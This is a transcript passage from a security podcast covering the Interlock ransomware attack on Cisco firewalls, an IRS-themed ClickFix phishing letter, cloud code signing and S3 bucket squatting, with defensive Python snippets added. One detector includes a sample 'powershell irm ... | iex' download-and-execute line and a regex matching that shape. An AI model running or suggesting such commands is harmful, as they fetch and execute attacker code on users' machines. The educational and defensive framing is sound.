Thank you, Siva. With Zscaler Zero Trust plus AI, you can safely adopt generative AI and private AI to boost productivity across the business. Their zero-trust architecture plus AI helps you reduce the risks of AI-related data loss and protects against AI attacks to guarantee greater productivity and compliance. Learn more at zscaler.com/security. That's zscaler.com/security. We thank him so much for supporting Security Now. Now I see Steve's all caffeinated, so let's get back to the show.

Mikah Sargent [01:45:09]:
Let's do it.

Steve Gibson [01:45:10]:
How did he know? That's a big cup. Okay, so, uh, just to finish on Amazon's threat intelligence, they wrote AWS infrastructure and customer workloads on AWS were not observed to be involved in this campaign. Meaning Cisco customers, not Amazon customers. They said this advisory shares comprehensive technical analysis and indicators of compromise to help organizations identify potential compromise and defend against Interlock's operations. Right? I mean, this was going on for 36 days. Anybody who the bad guys could find who had this firewall may well have been compromised. So this is, you know, a true problem. They said Amazon Threat Intelligence identified threat activity potentially related to this CVE-2026-20131 beginning January 26th. Observed activity involved HTTP requests to a specific path in the affected software.

Steve Gibson [01:46:17]:
Request bodies contained Java code execution attempts and two embedded URLs, one used to deliver configuration data supporting the exploit and another designed to confirm successful exploitation by causing a vulnerable target to perform an HTTP PUT request and upload a generated file. So that was the compromised system sending stuff back up to the bad guys' infrastructure. They said multiple variations of these URLs were observed across different exploit attempts. To advance the investigation and obtain additional threat intelligence, we performed— so they were pretending to be infected— we, Amazon, performed the expected HTTP PUT request with the anticipated file content. Essentially, we pretended to be a successfully compromised system. This successfully prompted Interlock to proceed to the next stage, issuing commands to fetch and execute a malicious ELF binary, a Linux executable file, from a remote server. So that suggests that the Cisco firewall is Linux-based, and so this was downloading Linux malware into, and to be run by, the Cisco firewall. They said when analysts retrieved the binary, they discovered the same host, that is, the hacker-controlled server, was used for distributing Interlock's entire operational toolkit.

Steve Gibson [01:47:55]:
The exposed infrastructure organized artifacts into separate paths corresponding to individual targets, with the same paths used for both downloading tools to compromise hosts and uploading operational artifacts back to the staging server. And if they were able to look around in there, they may have seen all the uploads from all the infected systems. No one's talking about how many systems were infected, but my guess is Amazon knows and Cisco probably knows and hopefully is not happy about it. They said the ELF binary and associated artifacts are attributable to the Interlock ransomware family based on convergent technical and operational indicators. The embedded ransom note and the Tor negotiation portal are consistent with Interlock's established branding and infrastructure. The ransom note's invocation of multiple data protection regulations— oh, you gotta love that. We just attacked you and infected you, and now we've exfiltrated your data, which puts you in violation of various data protection regulations. Congratulations.

Steve Gibson [01:49:08]:
Oh, by the way, yes, congratulations. So they said the ransom note's invocation of multiple data protection regulations reflects Interlock's documented practice of citing regulatory exposure to pressure victims, essentially threatening organizations not just with data encryption and exfiltration, but with regulatory fines and compliance violations. Wow. It's clever. It's clever. They're bold. The campaign-specific organization identifier embedded in the note aligns with Interlock's per-victim tracking model. Interlock has historically targeted specific sectors where operational disruption creates maximum pressure for payment.

Steve Gibson [01:50:00]:
Education represents the largest share of their activity, followed by engineering, architecture, and construction firms, manufacturing and industrial organizations, healthcare providers, and government and public sector entities. Amazon's posting then goes into very interesting and rich detail. It's certainly relevant to anyone who may have fallen victim to this or anyone who might worry that they may have. But what matters most is the way Amazon's threat intelligence group concludes. They write, the real story here isn't just about one vulnerability or one ransomware group. It's about the fundamental challenge zero-day exploits pose to every security model. When attackers exploit vulnerabilities before patches exist, even the most diligent patching programs cannot protect you during that critical window. This is precisely why defense in depth is essential. Layered security controls provide protection when any single control fails or hasn't yet been deployed.

Steve Gibson [01:51:21]:
Rapid patching remains foundational in vulnerability management, but defense in depth helps organizations not be defenseless during the window between exploit and patch. Right? So there you have it. The point Amazon is making is that if there is no defense in depth, if everything relies upon that single point, which could fail, and we see keeps failing, an organization's security perimeter could be breached even if they did absolutely nothing wrong. During that at least 5-week interval, any fully patched and fully up-to-date Cisco firewall could have been successfully breached through no fault of their IT managing staff. Unfortunately, this is not what we normally see. We're usually noting that lax and lazy and inattentive IT was at fault, at least in part, for not keeping their equipment up to date, right? Like if a patch was available months ago and they still hadn't gotten around to updating. But not so this time. As Amazon reminds us, defense in depth is needed because it's never safe to depend entirely upon any single security control.

Steve Gibson [01:53:03]:
Anytime any management portal is exposed to the entire global internet where access is controlled by some form of authentication, the security of the entire organization now rests upon that single point, which could fail. And that state of affairs would be acceptable if nothing more could be done, right? If we've done everything and we still have a single point of failure, if nothing more could be done, then okay, I guess that's the best we can do. But it is almost always the case that additional parallel protections could be erected so that, for example, almost no one is even able to see that possibly vulnerable authentication interface. No one in China, no one in North Korea, no one in Iran, no one in Russia can even get to it, because there's port filtering that blocks their access to that authentication interface. Unless you really need everybody in the world to be able to guess your password, don't give them the opportunity.
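The port filtering Steve describes normally lives in a border firewall or router ACL rather than in application code, but the allow-list logic is simple enough to sketch in Python; the networks here are illustrative documentation and private ranges, not anyone's real configuration.

```python
from ipaddress import ip_address, ip_network

# Hypothetical allow-list: only these source networks may even reach
# the management interface; all other sources are dropped before any
# password guessing can begin.
MGMT_ALLOWED = (ip_network("203.0.113.0/24"), ip_network("10.0.0.0/8"))

def may_reach_mgmt(source: str) -> bool:
    addr = ip_address(source)
    return any(addr in net for net in MGMT_ALLOWED)

print(may_reach_mgmt("10.1.2.3"))      # prints True  (internal admin)
print(may_reach_mgmt("198.51.100.7"))  # prints False (rest of the internet)
```

The equivalent perimeter firewall rule denies the management port by default and permits only the listed sources, which is Steve's least-privilege point: an attacker who cannot even reach the login page cannot guess the password.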

Mikah Sargent [01:54:23]:
So then arguably— you said, um, in this case the IT did everything right, but it seems like you are also arguing that they didn't, because doing everything right would also mean that you have security in depth, right?

Steve Gibson [01:54:38]:
I— yeah, so that's a very good point. What I meant was IT was, at least, keeping everything patched. But this demonstrates that even keeping everything patched is really no longer enough. You need other layers. And if somebody had other layers, although you wouldn't want to be lax on patching, at least being lax on patching, like being a few weeks or months late, wouldn't get you infected, because bad guys couldn't even attempt to infect your system. So really, the jargon that I've been using most recently, that I used at Zero Trust World and before, was really bringing stronger meaning to least privilege. You want least privilege to apply. It is a privilege if someone in China has the opportunity to guess your password.

Steve Gibson [01:55:45]:
Why? Why have you given Chinese attackers the privilege of doing that? They shouldn't even be able to see that you have a management interface. You know, they should be blocked by simple IP-based filtering, and it's so easy to do. But everyone says, oh, look, Cisco, you know, we've got security. No. You need— your security needs security.

Mikah Sargent [01:56:13]:
I like that. That's a shirt for security now. Your security needs security.

Steve Gibson [01:56:17]:
Your security needs security. Okay, so finally, before we talk about listener feedback, I just did want to mention that Cisco's not alone. Last Wednesday, and then updated on Saturday, Ubiquiti released a security update to patch a critical flaw, also one of the rare— you know, it used to be that CVSS 10.0s were rare, right? Nobody had them. The worst you would see was a 9.8, and we would joke about, oh, you've got to try real hard to get up to a 10.0. Well, unfortunately, Cisco has put the lie to that because they're getting them all the time now. Uh, in this case, so did Ubiquiti. A CVSS 10.0 was discovered in its UniFi internet gateway and Wi-Fi management application. The flaw enabled a path traversal exploit that could allow threat actors to access the device's configuration files.
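A path traversal bug of the kind just described is typically a failure to canonicalize a requested path before checking it. Here's a minimal sketch of the correct check, with a made-up base directory since the UniFi internals aren't public: resolve first, then verify containment, because "../" sequences survive naive string checks but not canonicalization.

```python
from pathlib import Path

# Hypothetical base directory for served files.
BASE = Path("/var/www/files").resolve()

def safe_resolve(requested: str) -> Path:
    # Resolve the combined path FIRST, then check containment; "../"
    # sequences defeat a naive prefix check on the raw string.
    candidate = (BASE / requested).resolve()
    if not candidate.is_relative_to(BASE):
        raise ValueError(f"path traversal attempt: {requested!r}")
    return candidate

print(safe_resolve("reports/summary.txt"))  # stays inside BASE

try:
    safe_resolve("../../etc/unifi/config")  # climbs out of BASE
except ValueError as err:
    print(err)
```

One caveat worth noting: if symlinks exist inside the base directory, `resolve()` follows them, so real servers also need to control what links can be created there.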

Steve Gibson [01:57:15]:
That's never good. And take over UniFi gateways that way. So Ubiquiti UniFi users are advised to update. I know we've got a bunch of Ubiquiti users and UniFi users. Leo is a big proponent. So everybody should update. Um, okay, some listener feedback. Vern Mastil, he said, uh, his email had the subject Clocks, Cursive, and Coding with AI.

Steve Gibson [01:57:47]:
And he wrote, Steve, we already have many children who cannot tell time on an analog clock. Many school systems began phasing out cursive writing a decade or more ago. In another generation, the ability to read and write cursive will fall into the category of arcane skills understood and practiced by only grizzled old professors in dusty, cluttered offices. He said, for decades we've been teaching students how to code. With advances in AI, it seems clear that this too will cease. Why bother when you can have an AI bang out apps in minutes? It seems likely that in the near future, old-school style programming will also become an arcane skill known and understood by only a few. I have to agree. I think we're very clearly seeing that actually writing code will change into managing its authorship by, uh, you know, AI devices.

Steve Gibson [01:58:58]:
That clearly seems to be where we're headed. And I remind everyone, what we have today is not what we're going to have tomorrow. It's going to be getting way, way better. Jeffrey Coe wrote, hey Steve, since it's getting close to tax time, I thought you might enjoy seeing the IRS version of the ClickFix exploit. And he said, I blurred out the script. He said, I'm a longtime listener, every episode, Spinrite owner, regards, Jeffrey D. Coe. So, and he attached in his email a picture of an Internal Revenue Service Department of the Treasury letter sent from Austin, Texas, with their zip code. It's letter number 1058, and it says, final notice, notice of intent to levy, and notice of your right to a hearing.

Steve Gibson [01:59:54]:
Addressee Jeffrey. And then there's— we have a case ID, and it says you must respond within 7, parentheses, numeral 7, calendar days. Your account has been selected for an office examination. Internal Revenue Code Section 7602 authorizes the IRS to require you to appear and provide records. We've identified a mismatch between the income on your tax return and data received from payers. Oh, uh, 1099s that you didn't report— that's never good. To resolve this matter, you must appear at an IRS location. Receipt of this notice must be acknowledged using the secure method below so we can schedule your appointment.

Steve Gibson [02:00:45]:
Non-acknowledgment will be deemed failure to respond. This notice does not contain clickable links. Acknowledgment may only be made via the secure method indicated. And now we have the increasingly familiar and unfortunately increasingly successful ClickFix variant. It says in a separate box callout, it says acknowledgment required. Step 1: Hold the Windows and R keys together to open Run. Step 2: Type or paste the acknowledgment code from the box below into the Open field. Step 3: Press Enter.

Steve Gibson [02:01:32]:
We will then assign your appointment. And then it provides, down below, the acknowledgment code, which starts out reading PowerShell space quote, and then we have something that Jeffrey blurred out. Then we have forward slash IRS and then a space vertical bar space IEX. And then a close quote. So, uh, again, as we know, this succeeds because so few people actually understand how Windows works. They're users who basically follow scripts of various forms, uh, and this latest trend of ClickFix, uh, to me is truly frightening. We've learned and previously reported that more than half, and I think it was 52%, of all exploits combined are now attributable to this single category of ClickFix-related social engineering attacks. More than half of all successful attacks.
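For the curious, the "acknowledgment code" shape being described, a PowerShell command piping a download into IEX (Invoke-Expression), executes whatever text the attacker's server returns. Since the actual blurred command is unknown, here is a purely illustrative Python heuristic for flagging that shape of pasted command, using hypothetical sample strings:

```python
import re

# Illustrative detection heuristic only: flags text that looks like a
# ClickFix lure, i.e. a powershell one-liner piping something into IEX
# (Invoke-Expression), which runs whatever the remote server returns.
CLICKFIX_RE = re.compile(r"powershell.*\|\s*iex\b|invoke-expression",
                         re.IGNORECASE)

def looks_like_clickfix(text: str) -> bool:
    return bool(CLICKFIX_RE.search(text))

# Hypothetical samples modeled on the letter's described structure:
print(looks_like_clickfix('powershell "irm https://example.invalid/IRS | iex"'))  # True
print(looks_like_clickfix("notepad.exe"))  # False
```

Real defenses operate a layer earlier, for example by policy-disabling the Run dialog for users who never need it, but the heuristic shows how recognizable the pattern is once you know to look for it.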

Steve Gibson [02:02:43]:
And even before we had this number, it was clear just looking at them that these attacks which leverage the user's lack of true understanding of how their PCs operate would turn out to be devastating. So, Jeffrey, thanks for sharing that. Um, Jim Housley wrote, listening to SN 1070 from March 17th, so that's last week, you were talking about properly signed malware and you commented about how the certificate had to be in an HSM. You know, hardware security module. He said, however, in the previous 2 or 3 weeks when you were talking about the current options for you to get a new certificate, you mentioned that signing in the cloud was becoming an option and seemed to be preferred by the CAs. With cloud-based signing, isn't it possible to share or steal access to the cloud account to use someone else's certificate? Longtime listener since episode 1, Spinrite owner. Thanks, Jim. In a word, yes, you are 100% correct, Jim.

Steve Gibson [02:03:52]:
Once code signing is moved into the cloud, then we introduce the whole new specter of remote network authentication into the code signing domain. And, huh, has there ever been any trouble with authenticating who people are over a network? Yeah. I believe I'd prefer to take responsibility for my own code signing certificate that's password protected in a hardware module which resides inside a closed server inside a locked rack inside a locked cage that's under 24/7 surveillance inside a triple-locked building with biometric, PIN, and badge readers and ever-prowling security. That's where mine is, and it has never suffered a break-in. So I think old-school physical security is a little better than allowing, you know, foreign attackers from states we don't trust free-roaming access, trying to impersonate us and get our code signed. I think Jim is exactly right. And finally, Michael wrote, hey Steve, you're not alone in your love of coding. Like you, I absolutely love writing my own code and solving problems myself.

Steve Gibson [02:05:24]:
I don't care if I'm not as fast as AI as long as I am fast enough to achieve my own goals. And like you, I'm writing professional software. It's not just a hobby, and like you, I'm a one-man team and my own boss. Consider this analogy: many fishermen buy their poles and lures at Walmart, which is fine, but there exists a small subset of fishermen who make their own lures. And I'll bet you would, Mikah, because you're a craftsperson.

Mikah Sargent [02:05:57]:
I was going to say, ooh, this sounds fun.

Steve Gibson [02:06:00]:
Who make their own lures because they're craftsmen who love the craft, and the experienced ones produce much better lures than the machine-assembled ones available at Walmart. I suspect your code is the same, and I'd much rather buy software like Spinrite from you, which I know has had your full attention and 30 years of maturation, than ask Claude to write a cheap knockoff. Just like I'd much rather write my own software, you know, make my own lures essentially, than cheat myself out of the joy of coding. That said, I do use Gemini to do the things I do not enjoy, like writing regular expressions, but even then it makes mistakes that I often need to correct. Anyway, you keep on coding and know that you're not alone. Longtime listener and huge fan, Michael. And I like Michael's fishing lure analogy a lot. I think it clearly articulates the craftsmanship aspect of coding, which anyone who codes because they love it just for its own sake would understand.

Steve Gibson [02:07:29]:
So for me, AI producing code does not represent a worry or competition. Uh, you know, I've never been interested in coding in a production environment. I love that many more people than ever before are now finding themselves able to get their PCs to do things they never could before, because AI is able to create code for them which does what they want. You know, to me, that's the greatest innovation so far on the AI coding front. And I'm sure that, as I've said, we've only seen the tip of the iceberg. We've got lots more to come in upcoming years. Okay, and Mikah, that brings us to, uh, our final break before we talk about bucket squatting— what it is, what it means. And, uh, I don't know, I don't think you want to squat over a bucket.

Mikah Sargent [02:08:27]:
No, no. In fact, uh, ever since the introduction of plumbing and the toilet, I don't need a bucket anymore. Um, anyway, well, let me take a moment here before we continue on with the show to tell you about Club TWiT at twit.tv/clubtwit. That is where you can go to sign up. $10 a month, $120 a year gets you access to the club. You can also use that QR code up in the top corner there. When you join the club, you gain access to some pretty awesome benefits. You get every single one of our shows ad-free, just the content.

Mikah Sargent [02:08:58]:
You also gain access to our special feeds. We have feeds that you will enjoy, including our feed that has our kind of behind the scenes before the show, after the show. We have a feed that has our live coverage of tech news events. We also have a feed that has our special Club TWiT shows like what was alluded to a couple of times here, my crafting corner. We have Stacey's Book Club. We have so many good things there in the club. And if that's not enough, well, can I also invite you to join our Discord, a fun place to go to chat with your fellow Club TWiT members and those of us here at Discord—

Mikah Sargent [02:09:34]:
Excuse me, those of us here at TWiT, we would love to have you. So head to twit.tv/clubtwit to check it out. Can't wait to welcome you into the fold. All right, back from the break. I've got my bucket. My, my legs are ready. Tell us all about it.

Steve Gibson [02:09:55]:
Okay, a little over a year ago, back in February 2025, so 13 months ago, Watchtower Labs posted a troubling narrative that documented the degree to which the security of significant parts of the internet has not been thoroughly thought through before being implemented. And it's not only new tech like, you know, the open source repositories that bad guys are constantly attacking and poisoning or some AI that can be subverted. The greater lesson the past 21 years of this podcast has taught over and over is that not only is security difficult, but we keep discovering that it's even more difficult than we thought. Or as we just recently noted, uh, security needs to be more secure. One thing to fully appreciate is that only a portion of security failures result from bugs; just as many failures are the result of inattention, oversight, and poor design, or what I often lump into the label of policy, as opposed to mistakes. So this suggests that even after AI being used to improve our security has matured, as I'm sure it will, and it's able to help us far more strongly eliminate traditional exploitable bugs, that will not be the end of our security woes, since even the misapplication of flawless technology can still result in serious consequences. So I don't see security as an issue being resolved by AI. So this brings us back to Watchtower Labs' exploration from February 2025.

Steve Gibson [02:11:48]:
It's a perfect teaching example of the unintended consequences of a system's poor design. Watchtower's posting, February before last, was given the headline, '8 million requests later, we made the SolarWinds supply chain attack look amateur.' So here's what they wrote back then. They said, surprise, surprise, we've done it again. We've demonstrated an ability to compromise significantly sensitive networks, including governments, militaries, space agencies, cybersecurity companies, supply chains, software development systems, and environments. And more. In November 2024, we decided, they wrote, to demonstrate the scenario of a significant internet-wide supply chain attack caused by abandoned infrastructure. I'll just pause to note that we've looked at problems with abandoned infrastructure before, where something has all been set up and has, for whatever reason, you know, been left behind. Pieces of it maybe have been taken away, but some pieces remain, and those end up being targets of abuse.

Steve Gibson [02:13:18]:
So they said, this time, however, we dropped our obsession with expired domains, which of course is an example we've looked at before, and instead shifted our focus to Amazon's S3 buckets, thus bucket squatting. They said it's important to note that although we focused on Amazon S3 for this endeavor, this research challenge approach and theme is cloud provider agnostic and applicable to any managed storage solution. Amazon's S3 just happened to be the first storage solution we examined. And we're certain the same challenge would apply to any customer organization usage in any storage solution provided by a cloud provider. The TL;DR is that we ended up discovering around 150 Amazon S3 buckets that had been used across commercial and open-source software products, governments, and infrastructure deployment and update pipelines before they were abandoned. Around 150 Amazon S3 buckets that were used before being abandoned. They said, so we registered those abandoned buckets to see what would happen. The question was, how many people might be attempting to request software updates from S3 buckets that appear to have been abandoned months or even years before? Wow.

Steve Gibson [02:15:06]:
At this, uh-huh. At the start of this, we had no idea how this would turn out. The research panned out progressively, with S3 buckets registered as they were discovered. It went rather quickly from, aha, we could put our logo on this website, to, uh, .mil? We should probably speak to someone about that. Oh my God. They said after spending around $400, as in only $400, on S3, CloudTrail, and CloudWatch logs querying, we had some results worth talking about. When creating these S3 buckets, we enabled logging, allowing us to track who requested files from each S3 bucket via the source IP address and what they requested, the file name, the path, and the name of the S3 bucket itself. Collectively, these S3 buckets received, huh, more than 8 million.

Steve Gibson [02:16:16]:
Are you kidding me? 8 million HTTP requests over a 2-month period for all sorts of things. Those making the queries for whatever it was that used to be there were requesting all sorts of things. Software updates, pre-compiled unsigned Windows, Linux, macOS binaries, virtual machine images, JavaScript files, CloudFormation templates, SSL VPN server configurations and credentials, and more. Had we been maliciously inclined, we could have responded to each of these 8 million requests with something malicious like a nefarious software update, a CloudFormation template that gave us access to an AWS environment, virtual machine images backdoored with remote access tooling, binaries that deployed remote access tooling, scary ransomware or such, and so forth, to give us access to the requesting system or network that the requesting system was within, and in some cases .mil. They wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations, based on DNS WHOIS lookups, that included government networks in the USA, including NASA, numerous laboratories, state governments, etc. The UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more. Then there were military networks and the networks of Fortune 500s, Fortune 100s, a payment card network, a major industrial product company, global and regional banks and financial services organizations, universities around the world, instant messenger software companies, cybersecurity technology companies, casinos, and more. We want to take this opportunity to give our sincere thanks, they wrote, to the entities who engaged with us when we realized what we'd stumbled into, including the UK's NCSC, who helped with introductions to the correct teams for us to speak to.

Steve Gibson [02:18:53]:
AWS, who took those around 150 S3 buckets off our hands to sinkhole. A major unnamed SSL VPN appliance vendor who worked with us very quickly and directly to take relevant S3 buckets off our hands. And CISA, who very quickly remediated an example that affected cisa.gov. Wow. Yeah. AWS's agreement to sinkhole the identified S3 buckets means that the release of this research does not increase the risk posed to any party. The same issues discussed in this research could not be recreated against the same specific S3 buckets thanks to the sinkholing performed by the AWS team. We believe that in the wrong hands, the research we performed could have led to supply chain attacks that outscaled and out-impacted anything we as an industry have seen so far.

Steve Gibson [02:20:02]:
As an industry, we spend a lot of time trying to solve issues like securing the supply chain in as many complex ways as possible, while still completely failing to cover something as simple as, quote, make sure you don't take candy from strangers, unquote. Okay, so what— so their posting then delves into the specific details about each of these many extremely embarrassing and potentially explosive exposures. To best understand how the industry got into this mess, we need to talk a bit about Amazon's somewhat astonishing AWS S3 bucket naming. First of all, a so-called bucket is nothing special. It's just Amazon's name for a cloud-based directory that can hold files. The name S3 itself, you know, stands, you know, that's three S's, right? Stands for Simple Storage Service. That's what S3 stands for, Simple Storage Service.

Steve Gibson [02:21:14]:
And simple is exactly what it is. The simplicity of Amazon's Simple Storage Service likely accounts for much of its, you know, early success and popularity. But it may also have contributed to the service's very spotty security record. I mean, there's been lots of problems with exposed AWS S3 buckets in the past. What's perhaps most shocking about Amazon's S3 bucket naming is that access to any S3 storage bucket is via an HTTP URL that ends with the standard web domain s3.amazonaws.com. And surprisingly, that ending can be prefixed with anything that looks like a valid World Wide Web domain name having between 3 and 63 characters, because that's exactly what it is. For example, I have an Amazon bucket named GRC. That's right, the bucket's name is GRC, which means that the bucket's full name is grc.s3.amazonaws.com.

Steve Gibson [02:22:42]:
And that bucket can be accessed by anyone, anywhere in the world at any time. And if that seems like a terrifying thing, you'd be correct to think that the only thing that even begins to make this system safe is access controls. So of course I have extremely strong access control security policies set on that bucket so that only I am able to work with it. But we've seen many examples where someone mistakenly, though presumably at some point, for some purpose, deliberately, allowed global read or read-write access to one of their S3 buckets, and disaster soon followed.

Mikah Sargent [02:23:30]:
That shouldn't even be an option, right? Like, why would anyone ever want—

Steve Gibson [02:23:35]:
Well, read-write, I would agree, although you might want people to be able to put information up, like to, to submit things to you. And certainly, if you were, for example, a certain SSL VPN appliance vendor, you might want to have your appliance querying that S3 bucket by name, whatever name you've given it, to pull down updates or security configuration improvements or something. So you're basically using it like a globally accessible CDN, a content delivery network. So actually, that's how many people use it. So, okay, as a consequence, I have a bunch of S3 buckets with many wonderful, simple, and fun names since I got there early and I grabbed them. Assignment of S3 bucket names could not be any simpler. It's as simple, uh, you know, as first come, first served, like Twitter handles were back in the day.

Steve Gibson [02:24:41]:
If you attempt to create a bucket, which is always by name, that effort will succeed if that name is not currently assigned to anyone else's bucket. So I have GRC, and that name is exclusively mine until I delete it. And as long as I have it, no one else can have it. In computing, we, you know, we call this— this is known as a global namespace, a single shared naming space where every name must be unique. So this means that everyone in the world shares the same naming space. There's only one Amazon S3 namespace that everyone shares to name any and all of the S3 buckets they may have created and governed by whatever access controls its owner may have configured. Any S3 bucket is accessible by its name simply by appending .s3.amazonaws.com to the end of it. For the sake of thoroughness, I'll add that S3 bucket names must be between 3 and 63 characters total.

Steve Gibson [02:26:07]:
They must always be lowercase alpha from a through z, or a numeric digit, 0 through 9. You can also have dots and hyphens, so just like domain names. They also must begin and end with a letter or a number, meaning they cannot begin or end with dashes, and they cannot contain a pair of adjacent dots. I mean, there are also a bunch of specially reserved prefixes and suffixes that Amazon has, uh, for things like punycode, in order to use a larger spelling alphabet. But overall, anything that anyone wishes to use will be valid within those guidelines. And notice that I, I keep saying that any bucket that isn't currently in use by someone— the point here, and this is where things get somewhat sticky, is that buckets that are no longer needed by their owner can be deleted. Two things occur when that happens: whatever content they may have contained will be deleted, and the bucket's name, which will then no longer be in use by its original owner, will be released and returned to the available bucket pool and become available for use by anyone who wishes to have it by name.
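Those naming rules can be sketched as a small validator. This is a hypothetical illustration only; Amazon's full rules also reserve certain prefixes and suffixes that aren't checked here.

```python
import re

# Basic S3 bucket-name rules as described above: 3-63 chars total,
# lowercase letters, digits, dots, and hyphens; must start and end
# with a letter or digit. Adjacent dots are checked separately.
BUCKET_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$")

def is_valid_bucket_name(name: str) -> bool:
    """Return True if `name` satisfies the basic S3 naming rules."""
    if not BUCKET_NAME_RE.match(name):
        return False
    if ".." in name:  # no pair of adjacent dots
        return False
    return True

print(is_valid_bucket_name("grc"))        # True: 3 chars, all lowercase
print(is_valid_bucket_name("My-Bucket"))  # False: uppercase not allowed
print(is_valid_bucket_name("-archive-"))  # False: can't start or end with a dash
print(is_valid_bucket_name("a..b"))       # False: adjacent dots
```

The regex alone enforces the 3-to-63-character window, since the first and last characters bracket 1 to 61 middle characters.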

Steve Gibson [02:27:47]:
So now we see what these Watchtower guys did. They created some form of directed brute force Amazon S3 bucket scanner which they used to search for named buckets that once existed but which were then deleted by their original creators. The problem was that many widespread automated tools, software update systems, antiviral templates, virtual machine images, even executable program downloaders continued in their attempts to access the content within those previously deleted buckets. So when these researchers discovered and recreated one of these previously deleted buckets and began logging the failed file access attempts, they were able to quickly learn what resource something somewhere was attempting to obtain from that bucket. The danger of this is obvious and truly horrifying. Given that they could see what it was that was being requested, they could readily choose to return whatever malicious content of that form they might wish. Since these requests were being made over TCP connections, the true IP address of the entities making the requests could be determined. Remember, they wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations that included, you know, government networks in the USA, NASA laboratories, state governments, etc., the UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more.
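The discovery step described here hinges on how S3 answers anonymous requests for a bucket name: a nonexistent (deleted or never-created) bucket generally yields HTTP 404, while an existing bucket yields 403 or 200 depending on its access policy. A minimal sketch of that classification, with a hypothetical helper name:

```python
def classify_bucket_probe(status_code: int) -> str:
    """Classify the HTTP status from an anonymous probe of
    <name>.s3.amazonaws.com.

    404 means the bucket does not currently exist. If deployed
    software still requests files from that name, the name is
    re-registrable by anyone: the bucket squatting risk above.
    403 or 200 means the bucket exists (private vs. publicly
    readable, respectively).
    """
    if status_code == 404:
        return "available"  # squattable if anything still references it
    if status_code in (200, 403):
        return "taken"
    return "unknown"

print(classify_bucket_probe(404))  # available
print(classify_bucket_probe(403))  # taken
```

The dangerous case is the "available" one: a 404 for a name that shipped software still queries is exactly what the researchers went hunting for.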

Steve Gibson [02:29:48]:
You know, on and on. Universities, instant messaging software companies, cybersecurity technology companies, casinos, and more. Credit card processing companies, you know, you name it. So this is not the result, and this is the key. This is not the result of a bug. This was the result of a fundamentally poor system design. Amazon should never have allowed bucket names to be recycled and reused. And in fact, right now, they ought to take any which were ever in use.

Steve Gibson [02:30:27]:
Yep. And, and sinkhole them. Just take them offline. Um, and really, when you think about it, bucket names are really just vanity, right? They're like—

Mikah Sargent [02:30:39]:
yeah, that's what I was thinking.

Steve Gibson [02:30:40]:
Yeah, it doesn't matter. They're like license plates. All you really need is something random and unique that's yours. It doesn't need to be your name, your initials, or some cutesy expression. But when users are given a choice, they'll tend to create bucket names that are meaningful to them. And that likely means they could be guessed by someone else. You know, anybody could guess I might have GRC. Well, I do.

Steve Gibson [02:31:10]:
So yeah, and I'll admit it, I'd rather have GRC than 092D7630B5F, you know, much sexier. But since S3 buckets are almost always accessed by automation, names were really never even necessary. They were just for fun. But that fun comes at a cost. Since Amazon chose to give us control over our bucket names, they should have appreciated the inherent problem with reuse and made them single-use from the start. Once taken, can never be used again. Okay, I have GRC, and that should be it forever. But it probably won't be unless they change their policy, which after all they could at any time.

Steve Gibson [02:32:02]:
My use of GRC, those three initials, will eventually end because I will eventually end. You know, whether I do it deliberately or not, I'll cancel my longstanding AWS account or it'll be canceled posthumously. At that time, the account's data will be deleted and the GRC bucket, the bucket name GRC, you know, uh, will be recycled back into the available pool, ready to be used again by someone. I have only ever used S3 as an off-premises encrypted storage archive. The danger for me has never been present. You know, there's nothing for anybody to ask for. But the guys at Watchtower discovered that many S3 users are using— or once used, in other words— their S3 buckets as a form of CDN to deliver quite sensitive files. Both Microsoft Azure and Google Cloud have long provided protections against the inherently dangerous practice of recycling bucket names within a single global namespace, which enables this form of bucket squatting.

Steve Gibson [02:33:21]:
As it's appropriately been called. But Amazon has been slow to come around. You know, change is always difficult, but the good news is, and the reason we're talking about this today, is that last Thursday, at long last, that finally changed. Amazon's announcement carried the headline, introducing account regional namespaces for Amazon S3 general purpose buckets. And they wrote the following— it's short, it's just quick. They said, today we're announcing a new feature of Amazon Simple Storage Service, Amazon S3, you can use to create general purpose buckets in your own account regional namespace, simplifying bucket creation and management as your data storage needs grow in size and scope. You can create general-purpose bucket names across multiple AWS regions with assurance that your desired bucket names will always be available for you to use. And that last phrase, with assurance that your desired bucket names will always be available for you to use, reminded me of another aspect of the single global namespace problem, which is that no one owns anything about any not-yet-created bucket names.

Steve Gibson [02:34:54]:
You know, the Amazon S3 namespace is flat, as I said, not hierarchical. If I own the domain, as I do, grc.com, then I also automatically own all subdomains and hostnames of grc.com, www.grc.com, and forums.grc.com, and noodles.grc.com. They're all automatically mine. We would say that everything under grc.com is mine. But, you know, under only applies because the domain name system is an inherently hierarchical namespace. There's no under in any flat namespace such as S3 has always used. So for example, you know, that, that, um, say that an organization had the practice of saving their annual archives into a series of buckets named ACME Enterprises Archive 2024. Then the next year, ACME Enterprises Archive 2025, and so on, where the year obviously is incremented successively.

Steve Gibson [02:36:14]:
If some begrudging ex-IT employee— you know where we're going— wished to cause their ex-employer ACME Enterprises some grief, nothing prevents them, the ex-employee, from opening an Amazon S3 account, which costs nothing, and creating the bucket ACME Enterprises Archive 2026. Now, at the end of this year, when ACME Enterprises went to create their succeeding year's archive bucket, that attempt would fail. Because someone else had beaten them to it. Having a single global namespace shared by every S3 user may have once seemed simple and maybe even fun, but there's a better way. So Amazon's addition of what they're now calling account regional namespaces is a long-needed addition. Their announcement continues to explain this, writing, with this feature you can predictably name and create general-purpose buckets in your own account regional namespace by appending your account's unique suffix in your registered bucket name. For example, the bucket named ourbucket-123456789012-us-east-1-an. Okay, not particularly sexy, but okay.

Steve Gibson [02:37:47]:
Um, that would exist in an account regional namespace. They said ourbucket is the bucket name prefix specified, then we add the account regional suffix to the requested bucket name, which is that -123456789012-us-east-1-an. If another account tries to create buckets using this account suffix— and Lord, why would they— their requests will be automatically rejected. So that's the good news. You get protection against somebody trying to create a bucket with your specific account number suffix. They finish saying your security teams can use AWS Identity and Access Management policies and AWS Organizations service control policies to enforce that your employees are only able to create buckets in their account regional namespace. This will help teams adopt the account regional namespace across your organization.
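Going only by the single example name quoted from the announcement, composing such a suffixed name might look like this sketch. The function name, the "-an" tail, and the 63-character cap applied here are assumptions drawn from that one example and from S3's general length limit.

```python
def account_regional_bucket_name(prefix: str, account_id: str, region: str) -> str:
    """Compose a bucket name in the style of the announcement's
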